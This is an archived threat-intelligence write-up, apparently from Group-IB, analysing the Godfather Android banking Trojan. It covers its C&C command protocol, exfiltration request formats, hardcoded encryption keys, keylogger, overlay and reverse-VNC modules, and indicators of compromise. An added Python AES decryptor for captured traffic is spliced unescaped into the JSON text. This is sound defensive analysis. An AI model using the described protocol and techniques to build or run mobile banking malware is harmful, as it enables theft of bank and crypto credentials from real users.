{
	"id": "8bacb332-c227-4a23-aaa3-73c76a18cebc",
	"created_at": "2026-05-05T02:46:05.074811Z",
	"updated_at": "2026-05-05T02:46:37.10312Z",
	"deleted_at": null,
	"sha1_hash": "ad279fa12ff24bffde1379e9761a9209b78f304b",
	"title": "Godfather Trojan - mobile banking malware that is impossible to refuse",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3178095,
	"plain_text": "Godfather Trojan - mobile banking malware that is impossible to\r\nrefuse\r\nArchived: 2026-05-05 02:07:04 UTC\r\nThe Android banking Trojan Godfather is currently being utilized by cybercriminals to attack users of\r\npopular financial services across the globe. Godfather is designed to allow threat actors to harvest login\r\ncredentials for banking applications and other financial services, and drain the accounts. To date, its victims\r\ninclude users of over 400 international targets, including banking applications, cryptocurrency wallets, and crypto\r\nexchanges.\r\nFew people realize that hiding under Godfather’s hood is an old banking Trojan called Anubis, whose\r\nfunctionality has become outdated due to Android updates and the efforts of malware detection and prevention\r\nproviders. In this blog post, Group-IB’s Threat Intelligence team describes in detail who Godfather attacks,\r\nhow it does it, and what this banking Trojan inherited from its predecessor.\r\nGroup-IB first detected Godfather, a mobile banking Trojan that steals the banking and cryptocurrency\r\nexchange credentials of users, in June 2021. Almost a year later, in March 2022, researchers at Threat Fabric were\r\nthe first to mention the banking Trojan publicly. A few months later, in June, the Trojan stopped being circulated.\r\nOne of the reasons, Group-IB analysts believe, why Godfather was taken out of use was for developers to update\r\nthe Trojan further. Sure enough, Godfather reappeared in September 2022, now with slightly modified WebSocket\r\nfunctionality.\r\nKey Findings\r\n1. Group-IB’s Threat Intelligence detected more than 400 international financial companies targeted by\r\nthe Godfather Android banking Trojan between June 2021 and October 2022.\r\n2. Half of the targeted financial companies were banks. Cryptocurrency wallets and exchanges were also\r\ntargeted.\r\n3. 
Godfather’s targets include 49 US-based companies, 31 Turkish-based companies, and 30 Spanish-based companies. Financial services providers in Canada, France, Germany, UK, Italy, and Poland\r\nwere also among the most affected.\r\n4. Godfather’s predecessor is another banking Trojan named Anubis.\r\n5. Godfather’s developers used Anubis source code as a basis and modernized it for newer versions of\r\nAndroid, adding relevant features and removing others such as file encryption.\r\n6. Godfather overlays web fakes on infected devices that appear when a user interacts with a decoy\r\nnotification or tries to open one of the legitimate applications targeted by Godfather.\r\nhttps://blog.group-ib.com/godfather-trojan\r\nPage 1 of 26\n\n7. Any data, such as usernames and passwords, entered on the web fakes are harvested by the threat actors.\r\nGodfather can also exfiltrate SMS and push notifications to bypass two-factor authentication.\r\n8. According to Telegram channels analyzed by Group-IB, Godfather is being distributed via the Malware-as-a-Service model.\r\n9. Based on Godfather’s network infrastructure, this banking Trojan is distributed through decoy applications\r\nhosted on Google Play.\r\nGodfather’s international targets\r\nTo date, 215 international banks, 94 cryptocurrency wallets and 110 crypto exchange platforms have fallen\r\nvictim to Godfather, as of October 2022. Most of the targeted companies are located in the United States, Turkey,\r\nSpain, Canada, Germany, France, and the UK. Interestingly, Godfather spares users in post-Soviet countries. If the\r\npotential victim’s system preferences include one of the languages in that region, the Trojan shuts down. 
This\r\ncould suggest that Godfather’s developers are Russian speakers.\r\nFigure 1: Who and where Godfather targets\r\nA signature technique found in the functionality of any Android banking Trojan is the use of web fakes\r\n(HTML pages created by the threat actors that are shown over legitimate applications), and Godfather has these in\r\nabundance. The fake pages that Godfather can overlay on infected devices appear after users click on decoy\r\nnotifications or open legitimate apps targeted by Godfather. All data entered into the fake web pages (such as\r\nusernames and passwords) is exfiltrated to command-and-control (C\u0026C) servers. Group-IB researchers were able\r\nto analyze some of the web fakes affecting Turkish banks, likely produced by a threat actor explicitly targeting\r\nTurkish companies, and these are provided below.\r\nGodfather’s functionalities also include:\r\nRecording the screen of the victim’s device\r\nEstablishing VNC connections\r\nLaunching keyloggers\r\nExfiltrating push notifications (for bypassing two-factor authentication); preceding versions of the Trojan also exfiltrated SMS messages\r\nForwarding calls (for bypassing two-factor authentication)\r\nExecuting USSD requests\r\nSending SMS messages from infected devices\r\nLaunching proxy servers\r\nEstablishing WebSocket connections (added to the new, September 2022 version of Godfather)\r\nGone but not forgotten: Anubis, we recognize you!\r\nThe basis of Godfather is a version of the banking Trojan called Anubis, whose source code was leaked as\r\nearly as 2019. As new versions of Android were released, and malware detection and prevention providers got up\r\nto speed, many Anubis features stopped working and were thrown into the dustbin of history. 
But why create a\r\nnew Trojan if one has been developed already?\r\nThe developers of Godfather used Anubis source code as a basis and modernized it for newer versions of\r\nAndroid, adding relevant features and removing others such as file encryption.\r\nWe found that both Trojans, Anubis and Godfather, have the same code base, but the C\u0026C communication\r\nprotocol and capabilities, together with their implementation, were modified in Godfather. The latter can therefore\r\nbe considered an Anubis fork.\r\nComparison of Godfather and Anubis\r\nOverlaps (shared with Anubis):\r\nMethod of receiving a C\u0026C address\r\nProcessing options from the request InjectCommandRequest\r\nImplementation of commands: startUSSD, startforward, stopforward, openbrowser, startsocks5, stopsocks5, killbot, startPush\r\nWeb-fake module\r\nWeb fakes obtained during analysis\r\nGodfather’s differences:\r\nCommunication protocol\r\nTraffic encryption algorithm\r\nUpdated functionality (e.g., Google Authenticator OTPs)\r\nA separate module for VNC\r\nCertain features have been removed (Godfather cannot encrypt files, record audio, or receive GPS information)\r\nImplementation of the proxy module\r\nImplementation of the ScreenCapture module\r\nGiven that the source code for Anubis is publicly available, it is not possible to claim that the two Trojans were\r\ncreated by the same developer or operated by the same threat group.\r\nA distinctive feature of Godfather is that its command-and-control (C\u0026C) servers are mentioned in Telegram\r\nchannel descriptions (this technique for obtaining C\u0026C addresses from Telegram channels has been used before\r\nfor some versions of Anubis). 
With the assistance of the new real-time Telegram monitoring functionalities of\r\nGroup-IB’s Threat Intelligence, our researchers received information relating to one Telegram channel\r\ncontaining messages indicating that Godfather can be distributed using the MaaS (Malware-as-a-Service) model.\r\nThese messages may be intended for operators of this Trojan. For example, the author of the message in the figure\r\nbelow is asking for a review of the service.\r\nFigure 3: A Telegram user asking for a review of the Godfather banking trojan\r\nGroup-IB analysts believe that Godfather can be distributed in a similar manner as Anubis was. Anubis\r\noperators often distributed their payloads via malicious downloader applications hosted on Google Play. Like in\r\nsome cases with Anubis, the Godfather payload imitates Google Protect. An example of the Anubis infection chain\r\nis shown in this article.\r\nAn analysis of the Trojan’s network infrastructure revealed a domain that contains the C\u0026C address of an Android\r\napplication. We could not obtain the payload, but we believe that this downloader installs Godfather on infected\r\ndevices. Below is a screenshot of Group-IB’s Graph Network Analysis tool, a feature of Group-IB’s\r\nintelligence-driven Unified Risk Platform, that shows links between the C\u0026C addresses of Godfather and the\r\ndownloaded application.\r\nFigure 4: Godfather’s network infrastructure, as detailed by Group-IB’s Graph Network Analysis tool\r\nGodfather C\u0026C addresses:\r\nhenkormerise[.]com\r\nbanerrokutepera[.]com\r\nheikenmorgan[.]com\r\nThe domain pluscurrencyconverter[.]com is the C\u0026C address of the downloader application. 
Below is a diagram\r\nshowing replicated DNS A records for Godfather C\u0026C addresses.\r\nFigure 5: Replicated DNS A records for Godfather’s C\u0026C addresses\r\nBelow is a screenshot of the hosted application on Google Play.\r\nFigure 6: Screenshot of malicious application linked to Godfather distribution in Google Play Store (Source:\r\n@0xabc0)\r\nBased on the correlation above, we believe that one of the ways that Godfather is distributed is via decoy\r\napplications hosted on Google Play.\r\nIn this blog post, we focus on providing a detailed analysis of two versions of Godfather:\r\nMD5: d7118d3d6bf476d046305be1e1f9b388\r\nSHA1: 2b3b78d3a62952dd88fc4da4688928ec6013af71\r\nSHA256: c79857015dbf220111e7c5f47cf20a656741a9380cc0faecd486b517648eb199\r\nVT Submission: 2022-03-22\r\nMD5: 7e061e87f9a4c27bfb69980980270720\r\nSHA1: 34d37927b35f422e7c28055ea989ef6524a668ef\r\nSHA256: b6249fa996cb4046bdab37bab5e3b4d43c79ea537f119040c3b3e138149897fd\r\nVT Submission: 2022-09-11\r\nGodfather malware responsibilities\r\nThe analyzed Godfather samples, one of which was uploaded to VirusTotal in September 2022, imitate Google\r\nProtect. After a user launches the malware, it imitates the legitimate Google application. An animation shows\r\nGoogle Protect “activity”, but the “scanner” does not actually do anything and instead Godfather’s criminal roots\r\nbecome apparent. 
After being launched, the malware achieves persistence on the infected device, creates a pinned\r\nnotification, and hides its icon from the list of installed applications.\r\nFigure 7: Google Protect animation\r\nInitialization also involves launching a service for requesting access to AccessibilityService, which is an Android\r\nfeature used by developers to adapt their applications to users with disabilities. Recently, AccessibilityService has\r\nbeen actively used to carry out ATS (Automated Transfer System) attacks. Access to AccessibilityService is also\r\nrequested when the “Scan” button is pressed. It is worth noting that users cannot launch the “scanning” function\r\nwithout granting the Trojan access to AccessibilityService.\r\nOf course, no scanning takes place. The scanning animation is displayed for 30 seconds, after which a message\r\nappears saying that no malicious applications were found. With access to AccessibilityService, Godfather grants\r\nitself the necessary permissions and starts communicating with the C\u0026C server.\r\nThe user assumes that there are no Trojans on the device and launches their banking application, entering\r\ntheir login details and not realizing that their data just got into the hands of threat actors.\r\nThe user eventually discovers that the money from their account is gone. They might try withdrawing the\r\npermissions or deleting the application, but the settings screens will keep closing and the device will keep returning to\r\nthe home screen.\r\nHow has the mafia boss managed to pull off such a heist? 
Let’s look into this.\r\nTechnical findings\r\nWhen launched for the first time, Godfather does the following:\r\nChecks system language and context\r\nInitializes SharedPreferences parameters\r\nLaunches a service to request access to AccessibilityService\r\nLaunches a service to communicate with the C\u0026C server\r\nHides its icon in the menu\r\nLet’s now look at some of the points above in more detail.\r\nChecking system language and context\r\nGodfather checks the system language, and the Trojan shuts down if the language is one of the following:\r\nRU (Russia)\r\nAZ (Azerbaijan)\r\nAM (Armenia)\r\nBY (Belarus)\r\nKZ (Kazakhstan)\r\nKG (Kyrgyzstan)\r\nMD (Moldova)\r\nUZ (Uzbekistan)\r\nTJ (Tajikistan)\r\nIt also checks the device context in order to determine whether the Trojan was launched in an emulator.\r\nIf so, Godfather stops functioning.\r\nInitialization of SharedPreferences parameters\r\nGodfather uses SharedPreferences to store necessary settings such as the C\u0026C server, the status of required\r\npermissions, the list of targets, and log data. The configuration file is called config.xml. Parameters for storing\r\nVNC settings (settings_port, settings_password) are saved to the default settings file. This stage also involves\r\ngenerating a unique identifier (the relevant field in the traffic is called key) which is used for identifying infected\r\ndevices; this is essentially a bot ID. The generation algorithm chooses 15 random characters from the\r\nuppercase Latin alphabet and the digits 0 to 9: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890.\r\nA service for requesting access to AccessibilityService\r\nThe service checks whether the malware has been granted access to AccessibilityService. If it has not, the\r\nservice requests access and creates a pop-up notification with the following text: “Enable accessibility for\r\nprotection to take effect ‘Google Protect”. 
This will happen every eight seconds until the user grants the malicious\r\napplication access to AccessibilityService.\r\nIn addition to being launched upon initialization, the service is launched when the victim device is restarted,\r\nturned on, or unlocked. You can find more information about what access to AccessibilityService is used for in the\r\n“AccessibilityService” section of this article.\r\nA service for communicating with the C\u0026C server\r\nThis service creates a task that is executed every 70 seconds. The service is launched when the device is turned\r\non, restarted, or unlocked. Before obtaining the C\u0026C server and communicating with it, the Trojan checks for\r\nthe necessary permissions (writing to external storage, reading contacts, reading the device status, and making\r\ncalls). If the Trojan does not have these permissions, it does the following:\r\nRequests the necessary permissions\r\nExfiltrates contacts\r\nExfiltrates the list of installed applications\r\nIn addition, the Trojan checks for administrator privileges. If they are not present, the malware requests them.\r\nNext, the Trojan communicates with the C\u0026C server to receive commands and turn on its modules. Network\r\nrequests, as well as commands that can be executed as a result of these requests, are described in the “Network\r\ncommunication” section of this article.\r\nTrojan Godfather network communication\r\nFigure 8: Communication between Godfather and C\u0026C addresses\r\nThe figure above shows Godfather’s communication with a C\u0026C address, which can be broken down into\r\nthree parts:\r\n1. Receiving an up-to-date C\u0026C address\r\n2. Receiving general commands (RatCommandRequest)\r\n3. 
Receiving commands for launching malware modules (InjectCommandRequest)\r\nIt is worth noting that RatCommandRequest and InjectCommandRequest commands are requested simultaneously.\r\nGodfather does not embed a list of C\u0026C addresses. Instead, it receives them from Telegram channel\r\ndescriptions by executing an HTTP request (the GetC2Request in the figure above). An example of a Telegram\r\nchannel with an encrypted C\u0026C address is shown below. The up-to-date C\u0026C address is encrypted using Blowfish\r\n(ECB mode), where the key is the string ABC. The same algorithm is used to decrypt received commands, which\r\nthe application requests from the C\u0026C server immediately after receiving the C\u0026C address. As mentioned earlier\r\nin the article, there are two modules for receiving commands: regular commands and commands for enabling and\r\ndisabling the Trojan modules (RatCommandRequest and InjectCommandRequest in the figure above).\r\nFigure 9: Example of Telegram channel with encrypted C\u0026C address\r\nRatCommandRequest\r\nThis request is used for receiving commands and a list of victim applications. 
Request parameters contain the\r\nfollowing information about the device:\r\nName of the network operator\r\nPhone status (locked or unlocked)\r\nWhether AccessibilityService permissions have been granted\r\nWhether the Trojan’s service for handling SMS messages has been installed\r\nWhether the necessary permissions have been granted (writing to external storage, reading contacts,\r\nreading the device status, and making calls)\r\nThe default user-agent for the device\r\nWhether the device is being charged (the new version does not have this feature)\r\nThe country code of the current network operator\r\nBot ID (the key parameter)\r\nWhether the screen is currently being recorded\r\nList of installed applications\r\nAndroid version\r\nDevice model\r\nExample of a request body:\r\n{country=us, new=true, ver=8.1.0, accessibility=true, ag=Mozilla/5.0 (Linux; Android 8.1.0; Google Pi\r\nThe server response is in the following format:\r\n%COMMAND%|%PARAM1%|%PARAM2%|%PARAM3%|%PARAM4%\r\nThe table below shows commands that can be sent to the bot from the C\u0026C server:\r\nstartUSSD: Execute a USSD request (the request comes from the server as a parameter).\r\nsentSMS: In newer versions this command is not processed, but such commands were\r\nprocessed in older versions that were distributed from June 2021. 
It sent SMS\r\nmessages from the infected device (the phone number and the message text are\r\nreceived from the server as parameters).\r\nstartApp: Launch the application (the name of the application package is received from the\r\nserver as a parameter).\r\ncachecleaner: Clear the cache of the application (the name of the package is received from the\r\nserver as a parameter).\r\nBookSMS: This command is currently not implemented, but in versions distributed in\r\nSeptember 2021, it sent SMS messages to all contacts (the message text is\r\nreceived from the server as a parameter).\r\nstartforward/stopforward: Enable and disable call forwarding (the phone number is received from the server\r\nas a parameter).\r\nopenbrowser: Open an arbitrary web page (the URL is received from the server as a parameter).\r\nstartsocks5/stopsocks5: Enable and disable a SOCKS5 proxy (host, user, pass, and port are received from\r\nthe server as parameters).\r\nkillbot: Self-delete.\r\nstartPush: Show push notifications that, when pressed on, open a web page (web fake). The\r\nparameters appname, title, and text are received from the server together with the\r\ncommand.\r\nInjectCommandRequest\r\nAs mentioned earlier in the article, this request is used for enabling/disabling various modules of the Trojan. The\r\nactions that can be performed as a result of this request are:\r\nEnable a keylogger\r\nLaunch a VNC server\r\nRecord the screen\r\nLock the screen\r\nExfiltrate and block notifications\r\nEnable silent mode\r\nEstablish a WebSocket connection\r\nDim the screen\r\nThis request does not send any information about the infected device to the server. 
Below is an example of request\r\nparameters.\r\n{inject_check=true, key=XQFGCGFTWXMH6PC}\r\nThe server’s response is in the following format: {0}:{1}:{2}:{3}:{4}:{5}:{6}:{7}:{8}:{9}:{10}:{11}:{12}:{13}:\r\n{14}:{15}:{16} (Example:\r\n“Injection::false::close:close:open:close:close:close:close:close:close:none::close:close“). The {*} values are\r\nparameters that are processed. The table below describes each parameter.\r\n{0}: Contains the string Injection, which is needed to start processing the remaining parameters.\r\n{1}: This parameter is used for delivering a list of packages for which – if the packages are launched –\r\nweb fakes will be downloaded and shown.\r\n{2}: If this parameter contains the value true, the option of exfiltrating and deleting SMS messages from\r\nthe device will be enabled. Otherwise, the option will be disabled.\r\n{3}: Contains the server for establishing a reverse VNC connection (the VNC connection is established on\r\nport 5500).\r\n{4}: This parameter must contain the value open for a reverse VNC connection to the server specified in\r\nthe parameter {3}.\r\n{5}: If this parameter contains the value open, silent mode is enabled and a task is launched that will\r\nunlock the device every 30 seconds. This option makes it possible to receive and execute commands\r\nfrom the server when the device is locked.\r\n{6}: If this parameter contains the value open, a keylogger is launched. 
Otherwise, it is disabled (this is the\r\nonly parameter that was seen enabled during our analysis).\r\n{7}: If this parameter contains the value open, a VNC server is launched.\r\n{8}: If this parameter contains the value open, the VNC server is stopped.\r\n{9}: If this parameter contains the value open, screen recording settings are reset.\r\n{10}: If this parameter contains the value open, screen recording starts.\r\n{11}: If this parameter contains the value open, the screen is locked.\r\n{12}: If this parameter contains the value open, notification exfiltration is enabled. Otherwise, notification\r\nexfiltration is stopped.\r\n{13}: Package name of the app that will be turned off if the app is launched on the device.\r\n{14}: Address of the server with which a WebSocket connection will be established to control the infected\r\ndevice remotely.\r\n{15}: If this parameter contains the value open, a WebSocket connection is established (the address is\r\ncontained in the option above).\r\n{16}: If this parameter contains the value open, the screen is dimmed.\r\nThe request URIs are hardcoded in the Trojan. Some of the requests found during file analysis include:\r\n/aks.php\r\n/ads.php\r\n/forwadingx.php\r\nData exfiltration\r\nWhile the Trojan is operational, data that threat actors are interested in is exfiltrated to the C\u0026C server.\r\nThis is done using requests with the following parameters:\r\nkey (bot ID)\r\nmessage (collected data in an encrypted form)\r\nnumber (“true”)\r\npage (type of exfiltrated data)\r\nExample of a request:\r\n{number=true, page=1, message=f8d2382f72890b1975e1f149d07fdd3c36fff1d523e4ea83b2b1f593f956e7a0, key=D\r\nThe field message contains information in encrypted form. The encryption algorithm is AES (CBC mode),\r\nwhere the key is 0123456789abcdef and the initialization vector is fedcba9876543210. Both the key and the IV are\r\n16 ASCII bytes, i.e. AES-128 with a static IV embedded in the sample, so any captured message field can be decrypted offline. 
The field page indicates\r\nthe type of exfiltrated data and has one of the following values: 1, 2, 4, 5. The table below describes exfiltrated\r\ndata according to the page type.\r\npage=1: The field contains one of the following:\r\nContacts list\r\nOne-time Google Authenticator passwords (com.google.android.apps.authenticator2)\r\nInformation about starting/stopping call forwarding\r\nInformation about starting/stopping a proxy\r\nInformation about received notifications (if the notification exfiltration option is enabled)\r\npage=2: Information about events tracked by the keylogger:\r\nTYPE_VIEW_CLICKED\r\nTYPE_VIEW_FOCUSED\r\nTYPE_VIEW_TEXT_CHANGED\r\nTYPE_WINDOW_STATE_CHANGED\r\nThis request is executed once the size of the collected information exceeds 12,000 bytes.\r\npage=4: Information about received SMS messages (the new, September 2022 version does not have this\r\nfeature).\r\npage=5: Contents of fields used for entering PINs or passwords.\r\nAccessibilityService\r\nAn important detail about Godfather is that it will not work if it is not granted access to AccessibilityService. 
The\r\nTrojan’s event handler has the following functionalities:\r\nLimiting the user’s ability to remove the Trojan from the system (if the user opens application settings or\r\nedits the list of applications that have administrator privileges, these windows will be closed)\r\nGranting itself the necessary permissions, such as SMS and notification processing, screen recording, and\r\nadministrator privileges\r\nExfiltrating Google Authenticator one-time passwords (OTPs) (com.google.android.apps.authenticator2),\r\nsimilar to Cerberus\r\nExfiltrating the contents of fields used for entering PINs or passwords\r\nIf an app included in the list of target applications is launched, the app’s screen will be recorded (if the\r\noption for turning the screen recording module on has been received) or a web fake will be shown (if the\r\napp is in the list of applications received from the server to download the web fake)\r\nProcessing commands: cachecleaner, killbot\r\nExfiltrating the results of USSD requests if the command startUSSD was received\r\nAccessibilityService includes handling the keylogger functionality. 
Below are templates for specific event types:\r\nEvent type Log template\r\nTYPE_VIEW_CLICKED\r\n“Package:” + %PACKAGE% + “|Time: ” + %DATE%\r\n(MM/dd/yyyy, HH:mm:ss) + “|[(CLICKED)]” + %DATA% +\r\n“{line}”\r\nTYPE_VIEW_FOCUSED\r\n“Package:” + %PACKAGE% + “|Time: ” + %DATE%\r\n(MM/dd/yyyy, HH:mm:ss) + “|[(FOCUSED)]” + %DATA% +\r\n“{line}”\r\nTYPE_VIEW_TEXT_CHANGED\r\n“Package:” + %PACKAGE% + “|Time: ” + %DATE%\r\n(MM/dd/yyyy, HH:mm:ss) + “|[(TEXT)]” + %DATA% + “{line}”\r\nTYPE_WINDOW_STATE_CHANGED\r\n“Package:” + %PACKAGE% + “|Time: ” + %DATE%\r\n(MM/dd/yyyy, HH:mm:ss) + “|[(WINDOW)]” + %DATA% +\r\n“{line}”\r\nIf the event TYPE_NOTIFICATION_STATE_CHANGED is triggered and the notification exfiltration option is\r\nenabled, the contents of the notification will be sent to the C\u0026C server.\r\nProxy module\r\nOn infected devices, Godfather can launch a backconnect proxy server, for which port 34500 is used (located\r\nin the body of the Trojan). The Trojan opens and configures this port for handling the SOCKS5 protocol.\r\nParameters (host, user, pass, port) necessary for implementing a proxy are received together with a command for\r\nlaunching a proxy (startsocks5).\r\nGodfather Trojan VNC module\r\nGodfather implements VNC functionality using two native libraries, which are stored in the Trojan’s resources in\r\nencrypted form. The encryption algorithm is AES (ECB mode), where the key is the string\r\nGWy8tfjp4mXpu58fCRpWCLxqHV8YmeHR. The libraries are stored in the Trojan’s resources with the following\r\nnaming convention: lib.%ARCHITECTURE%.godfat.so, lib.%ARCHITECTURE%.vncserver.so. It is worth noting\r\nthat in the new version of the Trojan these libraries are stored in unencrypted form and have the following names:\r\nlibspotify.so, libjson.so.\r\nlib.%ARCHITECTURE%.vncserver.so is an open-source library used for implementing VNC connections. 
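The two hardcoded keys on this page, the AES-CBC key and IV for the exfiltration message field (under Data exfiltration) and the AES-ECB key GWy8tfjp4mXpu58fCRpWCLxqHV8YmeHR for the encrypted native libraries just described, can both be handled by one decryptor. The block below is an added example written for this page, not code from Group-IB or from the malware: it implements AES decryption with the Python standard library only, so it runs offline on an analysis machine; the 16-byte message key means AES-128 and the 32-byte resource key means AES-256. The page does not state the padding scheme, so PKCS#7 is an assumption and is stripped only when it validates, and the FIPS-197 known-answer vectors are built in to prove the cipher core before it is run on a real capture.

```python
# Added example for this page, not Group-IB or Godfather code: a standard-library-only AES
# decryptor for the two hardcoded keys in the write-up (AES-128-CBC for the exfiltration
# message field, AES-256-ECB for the native VNC libraries). PKCS#7 padding is an assumption.
EXFIL_KEY = b'0123456789abcdef'                     # 16 bytes -> AES-128 (from the page)
EXFIL_IV = b'fedcba9876543210'                      # static IV (from the page)
RESOURCE_KEY = b'GWy8tfjp4mXpu58fCRpWCLxqHV8YmeHR'  # 32 bytes -> AES-256 (from the page)

def _gmul(a, b):
    # Multiplication in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1.
    r = 0
    while b:
        r ^= a if b & 1 else 0
        a = (a << 1) ^ (0x11b if a & 0x80 else 0)
        b >>= 1
    return r

def _build_sboxes():
    # S-box = affine transform of the multiplicative inverse; derived rather than typed in.
    sbox, inv_sbox = [0] * 256, [0] * 256
    for x in range(256):
        inv = next((y for y in range(1, 256) if _gmul(x, y) == 1), 0)
        s = inv
        for _ in range(4):                      # s = b ^ rotl(b,1) ^ rotl(b,2) ^ rotl(b,3) ^ rotl(b,4)
            inv = ((inv << 1) | (inv >> 7)) & 0xff
            s ^= inv
        sbox[x] = s ^ 0x63
    for i, v in enumerate(sbox):
        inv_sbox[v] = i
    return sbox, inv_sbox

SBOX, INV_SBOX = _build_sboxes()

def _expand_key(key):
    # FIPS-197 key schedule: Nr+1 round keys of 16 bytes, column-major like the state.
    if len(key) not in (16, 24, 32):
        raise ValueError('AES key must be 16, 24 or 32 bytes')
    nk, rounds = len(key) // 4, len(key) // 4 + 6
    w = [list(key[i:i + 4]) for i in range(0, len(key), 4)]
    rcon = 1
    for i in range(nk, 4 * (rounds + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]    # RotWord + SubWord
            t[0] ^= rcon
            rcon = _gmul(rcon, 2)
        elif nk == 8 and i % nk == 4:
            t = [SBOX[b] for b in t]                # extra SubWord for 256-bit keys
        w.append([a ^ b for a, b in zip(w[i - nk], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(rounds + 1)]

def _inv_shift_rows(s):
    # State index is 4*col + row; row r is rotated right by r positions.
    return [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]

def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
    return out

def _decrypt_block(block, rk):
    s = [b ^ k for b, k in zip(block, rk[-1])]
    for rnd in range(len(rk) - 2, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, rk[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, rk[0]))

def aes_ecb_decrypt(ct, key):
    if len(ct) % 16:
        raise ValueError('ciphertext is not a whole number of 16-byte blocks')
    rk = _expand_key(key)
    return b''.join(_decrypt_block(ct[i:i + 16], rk) for i in range(0, len(ct), 16))

def aes_cbc_decrypt(ct, key, iv):
    # CBC decryption is ECB decryption XORed with (IV || all but the last ciphertext block).
    return bytes(p ^ c for p, c in zip(aes_ecb_decrypt(ct, key), iv + ct[:-16]))

def strip_pkcs7(data):
    # Returns data unchanged when the padding does not validate (usually a wrong key, not framing).
    n = data[-1] if data else 0
    return data[:-n] if 1 <= n <= 16 and data.endswith(bytes([n]) * n) else data

def decode_exfil_message(hex_message):
    # Input: the hex message field of an exfiltration request (page 1/2/4/5 data inside).
    return strip_pkcs7(aes_cbc_decrypt(bytes.fromhex(hex_message), EXFIL_KEY, EXFIL_IV))

def decrypt_resource(blob):
    # Input: raw bytes of an encrypted lib.<arch>.godfat.so / lib.<arch>.vncserver.so resource.
    return strip_pkcs7(aes_ecb_decrypt(blob, RESOURCE_KEY))

def known_answer_ok():
    # FIPS-197 appendix C.1 (AES-128) and C.3 (AES-256): prove the core before trusting a capture.
    pt = bytes.fromhex('00112233445566778899aabbccddeeff')
    c128, c256 = bytes.fromhex('69c4e0d86a7b0430d8cdb78070b4c55a'), bytes.fromhex('8ea2b7ca516745bfeafc49904b496089')
    return aes_cbc_decrypt(c128, bytes(range(16)), bytes(16)) == pt and aes_ecb_decrypt(c256, bytes(range(32))) == pt

if __name__ == '__main__':
    print('AES core verified:', known_answer_ok())
    print(decode_exfil_message('f8d2382f72890b1975e1f149d07fdd3c36fff1d523e4ea83b2b1f593f956e7a0'))  # hex from the page
```

decode_exfil_message takes the hex string from the message parameter; decrypt_resource takes the raw bytes of a lib.<arch>.*.so resource pulled out of the older APK (the September 2022 sample stores the libraries unencrypted, so it needs nothing). If either output is not plausible data, suspect a different padding or a rekeyed build rather than the mode logic, which the known-answer check covers.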
The\r\ncode of this library is available at GitHub.\r\nThe library lib.%ARCHITECTURE%.godfat.so is a JNI (Java Native Interface) wrapper that is required for the\r\nabovementioned native library to function correctly.\r\nTransferring control via VNC occurs in two stages:\r\n1. The C\u0026C server sends a command to start the VNC module.\r\n2. The C\u0026C server sends an address to which the infected device will connect and transfer VNC control\r\n(establish a reverse VNC connection)\r\nWhen the command to launch a VNC server is received, no parameters from the server are processed. Below are\r\nstatic parameters that are used when the server is launched:\r\nport: the value of the SharedPreferences settings_port parameter (by default the value is 5900)\r\nuser: the value of the system settings bluetooth_name parameter\r\npass: the value of the SharedPreferences settings_password parameter (by default the value is 123).\r\nWhen the command for establishing a reverse VNC connection is processed, the “host” parameter to which the\r\nreverse connection will be established is transferred. The port for the connection is contained in the Trojan and has\r\nthe value 5500 (the default port for the reverse VNC connection).\r\nThe figure below shows the process of connecting to a remote VNC client.\r\nFigure 10: How Godfather connects to remote VNC clients\r\nScreenCapture module\r\nThis module is used for recording the screen of an infected device and then exfiltrating the recording to the C\u0026C\r\nserver. The module makes it possible to steal data entered by the user in legitimate applications as well as any\r\ninformation contained in an application that Godfather targets. 
This module is launched in one of two cases:\r\nA relevant command has been received from the server\r\nAn application from the target list has been launched (the malware should receive this list in advance)\r\nIt is worth mentioning that some of the package names from the list were intentionally altered (the character 1 was\r\nadded to the package names) to prevent the module from being launched. It is possible that the threat actors have\r\nnot yet decided what they will do with the data they receive or they simply lost interest in these applications\r\nduring the testing stage. The screen is recorded using standard Android classes:\r\nandroid.media.projection.MediaProjectionManager\r\nandroid.media.projection.MediaProjection\r\nThe screen recording is saved to a file whose path is created according to the following template:\r\n%DEFAULT_DIRECTORY_MOVIES%/%KEY%_%CURRENT_TIME_MS%.mp4\r\nThe screen is recorded for two minutes. The resulting file is sent to the C\u0026C server. The URL for sending the file\r\nis created according to the following template:\r\n%DECRYPTED_C2%/mp4_recorder.php\r\nBelow is the format of the request body:\r\n--*****\\r\\nContent-Disposition: form-data; name=\\\"myfile\\\";filename=\\\"%FILENAME%\\\"\\r\\n\\r\\n%FILE_CONTE\r\nFor the screen recording to be initialized, the relevant options received from the C\u0026C server must be enabled and\r\nthe relevant permissions must be obtained.\r\nWebSocket module\r\nThis module was added to the updated September 2022 version of the banking Trojan. The module makes it\r\npossible to use a persistent WebSocket connection to control an infected device. 
